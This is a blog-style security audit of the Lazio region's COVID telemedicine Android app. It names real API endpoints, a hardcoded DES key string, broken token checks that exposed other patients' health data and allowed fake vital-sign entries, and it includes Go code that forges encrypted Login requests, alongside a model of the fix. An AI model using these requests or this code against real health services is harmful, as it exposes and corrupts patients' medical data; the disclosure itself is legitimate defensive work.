LAZIOdrCOVID: a 30-minute audit to blow up the castle

EDIT:

Looks like the major issue (posting data to other people) has been solved. That’s very good considering I made the post less than 6 hours ago and it’s Sunday.


Hey folks!
This morning a friend of mine (FABIO – Naif – PIETROSANTI) asked me to take a look at an Android application recently released on the Google Play Store. It provides a service linking people born in the Lazio region of Italy with their family doctors, allowing them to submit personal information such as temperature, blood pressure and more.

I’ll go fast and straight, following the example of the technical security researchers who analyzed the Singapore COVID-19 TraceTogether app: showcase all the vulnerabilities and urge governments to provide open source, well-made solutions instead of fast and terrible ones.

The application itself is very small. There are around 10-15 classes, and figuring out what was needed to mess things up was very fast.

Let’s start

Getting people’s family doctor

Registering to the service is done by providing an email address, a phone number and a fiscal code (an alphanumeric ID that can be derived from a person’s name, surname, date of birth and birth place, so it is not a secret).

https://servicelazioadvice.regione.lazio.it/api/PatientRegistration/Login/?fiscalCode=ENCRYPTED_FISCAL_CODE&emailAddress=ENCRYPTED_EMAIL_ADDRESS&phoneNumber=ENCRYPTED_PHONE_NUMBER

The encryption is DES, and the key is derived from a static MD5 of the string “1nt3ll1c4r3” hardcoded in the Java code. Anyone who decompiles the APK gets the key, so this “encryption” neither hides the parameters from an attacker nor proves that the request came from the legitimate app.

By firing a GET request to the endpoint above we are able to:

A) access the name of the family doctor for the given fiscal code
B) trigger the SMS verification an unlimited number of times to the encrypted phone number (any phone number)
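To make the point concrete, here is the client-side parameter “encryption” reproduced in Go from the description above. This is an added example written for this page, not code from the post or decompiled from the app. Only two facts come from the post: the key is an MD5 of the hardcoded string “1nt3ll1c4r3” and the cipher is DES. Everything else is an assumption and is labelled as such in the code: the first 8 bytes of the digest are used as the key, the mode is DES/ECB/PKCS5Padding (Java’s default for Cipher.getInstance("DES")), and the query string carries the ciphertext hex-encoded. The fiscal code, email and phone number are constructed samples. The EncryptParam/DecryptParam pair shows that whoever holds the APK can both forge a valid Login request for any fiscal code and decrypt parameters captured on the wire, so the scheme adds nothing over TLS.

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/md5"
	"encoding/hex"
	"errors"
	"fmt"
	"net/url"
)

const (
	hardcodedSecret = "1nt3ll1c4r3" // the string the post reports hardcoded in the Java code
	loginEndpoint   = "https://servicelazioadvice.regione.lazio.it/api/PatientRegistration/Login/"
)

// desKey is MD5(hardcodedSecret) cut to DES key size.
// ASSUMPTION: the first 8 bytes of the 16-byte digest; the post only says "a static md5".
func desKey() []byte {
	sum := md5.Sum([]byte(hardcodedSecret))
	return sum[:8]
}

// desECB runs DES block by block with no chaining; padding is handled by the callers.
// ASSUMPTION: DES/ECB/PKCS5Padding, the default for Java's Cipher.getInstance("DES").
func desECB(in []byte, encrypt bool) ([]byte, error) {
	block, err := des.NewCipher(desKey())
	if err != nil {
		return nil, err
	}
	if len(in) == 0 || len(in)%des.BlockSize != 0 {
		return nil, errors.New("input is not block aligned")
	}
	out := make([]byte, len(in))
	for i := 0; i < len(in); i += des.BlockSize {
		if encrypt {
			block.Encrypt(out[i:], in[i:i+des.BlockSize])
		} else {
			block.Decrypt(out[i:], in[i:i+des.BlockSize])
		}
	}
	return out, nil
}

// EncryptParam produces the value the client puts in the query string.
// ASSUMPTION: hex encoding; the post shows only placeholders.
func EncryptParam(value string) (string, error) {
	n := des.BlockSize - len(value)%des.BlockSize // PKCS#5: always pad, 1..8 bytes
	padded := append([]byte(value), bytes.Repeat([]byte{byte(n)}, n)...)
	ct, err := desECB(padded, true)
	if err != nil {
		return "", err
	}
	return hex.EncodeToString(ct), nil
}

// DecryptParam recovers a parameter captured on the wire. The key is static and
// ships inside the APK, so anyone holding the request can do this too.
func DecryptParam(encoded string) (string, error) {
	ct, err := hex.DecodeString(encoded)
	if err != nil {
		return "", err
	}
	pt, err := desECB(ct, false)
	if err != nil {
		return "", err
	}
	n := int(pt[len(pt)-1])
	if n == 0 || n > des.BlockSize || !bytes.Equal(pt[len(pt)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return "", errors.New("invalid PKCS#5 padding")
	}
	return string(pt[:len(pt)-n]), nil
}

// LoginURL builds the GET request described in the post with every field
// "encrypted" under the hardcoded key (url.Values sorts the parameter names).
func LoginURL(fiscalCode, email, phone string) (string, error) {
	q := url.Values{}
	for name, v := range map[string]string{"fiscalCode": fiscalCode, "emailAddress": email, "phoneNumber": phone} {
		enc, err := EncryptParam(v)
		if err != nil {
			return "", err
		}
		q.Set(name, enc)
	}
	return loginEndpoint + "?" + q.Encode(), nil
}

func main() {
	const fc = "RSSMRA80A01H501U" // constructed sample, not a real person
	u, err := LoginURL(fc, "mario.rossi@example.com", "+390000000000")
	if err != nil {
		panic(err)
	}
	enc, _ := EncryptParam(fc)
	dec, _ := DecryptParam(enc)
	fmt.Println(u)
	fmt.Printf("%s -> %s -> %s\n", fc, enc, dec)
}
```

Two properties are worth noticing when you run it: the ciphertext for a given fiscal code is always identical (ECB under a static key), so requests can even be precomputed without touching the cipher, and a single captured request yields the plaintext phone number and email of its owner.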

Accessing people’s exams and reports

The login request above, besides the family doctor, also returns an access token, which is used on all subsequent requests from the application, and a patient ID.

Here is an example of a patient ID, with the last two digits hidden:
ASUR00000000019583XX

Technically, we would expect this token to become valid only after it is confirmed with the SMS code, but guess what?

A) we can use this token without any validation
B) we can use this token with any other patient ID to access their information

https://servicelazioadvice.regione.lazio.it/api/Exams/GetExaminationsByType/?token=TOKEN&patient=PATIENT_ID&type=NUMERIC_TYPE (e.g. 1 for temperature)

Adding reports to other people

Guess what? With no big surprise at this point, we are also able to post data under other people’s IDs.

We are able to issue POST requests, e.g.:

https://servicelazioadvice.regione.lazio.it/api/Exams/InsertExamValue/?token=TOKEN
{"patientId": "PATIENT_ID", "type": "4", "f_cardiaca": "74"}

This one updates the heart rate, for example.

What if someone started spamming temperature updates on everyone with a value of, say, 39?

Chat with the doctors, get personal messages

The application offers a way to chat with the family doctor and receive messages.

https://servicelazioadvice.regione.lazio.it/api/Chat/GetAllMessagesCrypt/?token=TOKEN&patient=PATIENT_ID&doctor=DOCTOR_ID

The doctor ID is returned by the login request.

https://servicelazioadvice.regione.lazio.it/api/Chat/ACK/?patient=PATIENT_ID&doctor=DOCTOR_ID HTTP/1.1


At this point, we didn’t go any further. In a world where people out there are targeting hospitals and health care facilities:

1) rushed solutions are not the way to go.
2) ask for expert opinions and an audit. Saving money on online solutions could result in something you don’t want to face.
3) go damn open source.

Massive scraping by iterating over the patient ID, which looks sequential (see the format above), is also possible.

Here I’m attaching the requests dumped from my device memory, in case anyone is interested in going further. (Note: we are not hiding information such as Fabio’s ID, phone number and email, which are public anyway.)

https://gist.github.com/iGio90/9e6dbba9431fa8bbcdc383fd62f0cbff
https://gist.github.com/iGio90/6d460313dfd4d7330d57d0943aee6063

Tips and tricks

We are fighting for a transparent and secure world, a bit utopian but whatever. All of the issues reported above can be addressed by:

A) validating the token (i.e. requiring the SMS confirmation) before accepting it on any request
B) storing on the backend which patient ID each token is allowed to access, and rejecting reads and writes for any other patient
C) eventually, removing the hardcoded DES key in favour of a key built at runtime; more generally, not relying on client-side encryption with a key shipped in the APK for anything security-relevant, since TLS already protects the transport
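The following is an added example written for this page, not code from the post or from the LAZIOdrCOVID backend, showing points A and B as an in-memory model in Go. It covers both the read path (GetExaminationsByType above) and the write path (InsertExamValue above): the vulnerable handler accepts any token that merely exists, while the fixed handlers route every request through one authorize check that requires the token to exist, to have been confirmed via SMS, and to be bound to the patient named in the request. The Backend and Session types, the token strings, the patient IDs, the SMS code and the exam values are all constructed for illustration.

```go
package main

import (
	"crypto/subtle"
	"errors"
	"fmt"
)

var (
	ErrNoSession   = errors.New("unknown token")
	ErrNotVerified = errors.New("token not yet confirmed via SMS")
	ErrForbidden   = errors.New("token is not authorised for this patient")
	ErrBadCode     = errors.New("wrong SMS code")
)

// Session is the per-token state the backend must keep: the patient the token
// was issued for and whether the SMS code has been confirmed.
type Session struct {
	PatientID string
	SMSCode   string // in production: random, short-lived and rate-limited
	Verified  bool
}

// Backend is an in-memory stand-in for the real service (constructed for this example).
type Backend struct {
	sessions map[string]*Session
	exams    map[string][]string // patient ID -> recorded values
}

func NewBackend() *Backend {
	return &Backend{sessions: map[string]*Session{}, exams: map[string][]string{}}
}

// Login issues a token bound to exactly one patient; nothing is served
// until ConfirmSMS succeeds.
func (b *Backend) Login(token, patientID, smsCode string) {
	b.sessions[token] = &Session{PatientID: patientID, SMSCode: smsCode}
}

// ConfirmSMS is the validation step the post found could be skipped.
func (b *Backend) ConfirmSMS(token, code string) error {
	s, ok := b.sessions[token]
	if !ok {
		return ErrNoSession
	}
	if subtle.ConstantTimeCompare([]byte(s.SMSCode), []byte(code)) != 1 {
		return ErrBadCode
	}
	s.Verified = true
	return nil
}

// authorize is the missing check: the token must exist, be confirmed, and be
// bound to the patient named in the request. Every data endpoint goes through it.
func (b *Backend) authorize(token, patientID string) error {
	s, ok := b.sessions[token]
	switch {
	case !ok:
		return ErrNoSession
	case !s.Verified:
		return ErrNotVerified
	case s.PatientID != patientID:
		return ErrForbidden
	}
	return nil
}

// GetExamsVulnerable mirrors the behaviour the post describes: any token that
// exists unlocks any patient's data, confirmed or not.
func (b *Backend) GetExamsVulnerable(token, patientID string) ([]string, error) {
	if _, ok := b.sessions[token]; !ok {
		return nil, ErrNoSession
	}
	return b.exams[patientID], nil
}

// GetExams is the fixed read path (GetExaminationsByType in the post).
func (b *Backend) GetExams(token, patientID string) ([]string, error) {
	if err := b.authorize(token, patientID); err != nil {
		return nil, err
	}
	return b.exams[patientID], nil
}

// InsertExamValue is the fixed write path (InsertExamValue in the post).
func (b *Backend) InsertExamValue(token, patientID, value string) error {
	if err := b.authorize(token, patientID); err != nil {
		return err
	}
	b.exams[patientID] = append(b.exams[patientID], value)
	return nil
}

func main() {
	b := NewBackend()
	b.exams["ASUR00000000000000A1"] = []string{"temperature=36.6"} // constructed IDs and values
	b.exams["ASUR00000000000000A2"] = []string{"temperature=37.1"}
	b.Login("tokA", "ASUR00000000000000A1", "482913")
	v, _ := b.GetExamsVulnerable("tokA", "ASUR00000000000000A2")
	fmt.Println("vulnerable, other patient:", v)
	_, err := b.GetExams("tokA", "ASUR00000000000000A2")
	fmt.Println("fixed, other patient:", err)
	fmt.Println("write before SMS:", b.InsertExamValue("tokA", "ASUR00000000000000A1", "temperature=39"))
	fmt.Println("confirm:", b.ConfirmSMS("tokA", "482913"))
	fmt.Println("write after SMS:", b.InsertExamValue("tokA", "ASUR00000000000000A1", "temperature=39"))
}
```

The design choice that matters is that the patient ID in the request is never trusted on its own: it is compared against the one stored with the token at login, so the “use the token on any other patient ID” trick fails with ErrForbidden, and the “use the token without validation” trick fails with ErrNotVerified. Rate limiting the SMS trigger per phone number (point B in the login section) is a separate fix not modelled here.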

As a hacker community we should monitor all the applications that get validated through the Ministry of Innovation fast call https://innovazione.gov.it/telemedicina-e-sistemi-di-monitoraggio-una-call-per-tecnologie-per-il-contrasto-alla-diffusione-del-covid-19/ and all the ones that get released and published, to ensure that proper technical security testing is done, with transparent public reports, because data protection is a technical topic before it is a juridical-legal one.


See you with the next well done service 🙂

Disclaimer: All the tests were performed using the tax code identifiers of Fabio and his family members, thus testing the security vulnerabilities by accessing the private data of citizens who gave their authorization.

9 Comments

Enrico March 29, 2020 Reply

“White hat hackers are fighting for a transparent and secure world, a bit utopian”, but here the problem is that those who create these services are totally incompetent.
Normally it would be a matter of jokes and funny stories to be shared among the security experts, but these days things like this become dramatic. Incompetence is a disaster for anyone in any area!! And it’s not the time for stupidity anymore. If COVID-19 teaches us something, it is that incompetence should be banned and vanish. I am even more utopian, I know!

Tglman March 29, 2020 Reply

Hi,

Responsible disclosure is as important as doing these tests, for the security of everyone. As much as I appreciate your effort to check the security of the app, this post does not sound responsible: before making this information public, the author should have been notified with a deadline for the publication of the information!!!

Ocram April 1, 2020 Reply

Great job, well documented. Today I’ve seen on TG a “similar” App, AllertaLOM from “Regione Lombardia” available only for Apple at the moment.
https://apps.apple.com/it/app/allertalom/id1455220682

It would be nice to do such a specific analysis of that one too (even without public disclosure of the technical details). Meanwhile, the privacy policy seems to be a bit too old (2019-Nov):

https://www.allertalom.regione.lombardia.it/privacyapp

Thanks for your effort

GiovanniRocca April 1, 2020 Reply

Hi! I already performed an audit on that application; however, it has no login, no info about COVID, nor any collection of personal data. Did you find anything of this in the iOS one?

Ocram April 1, 2020 Reply

Nope, I’ve only seen the app on TV and had a flashback to your great work. I could try it and report back.
